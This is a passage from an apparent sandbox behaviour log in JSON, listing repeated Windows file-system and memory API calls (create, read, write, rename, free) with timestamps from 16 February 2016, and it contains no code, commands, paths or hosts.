17:41:55,111", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,111", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,121", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,131", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,131", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,141", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,141", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,151", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,161", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,161", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,171", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,181", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,192", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,202", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,212", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,212", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,212", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,212", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,212", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,212", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,222", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,222", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,232", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,242", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,252", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,262", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,272", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,282", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,282", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,292", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,302", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,312", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,312", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,322", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,332", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,332", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,342", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,352", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,352", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,362", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,372", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,372", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,382", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,392", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,392", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,402", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,412", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,412", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,422", "api": 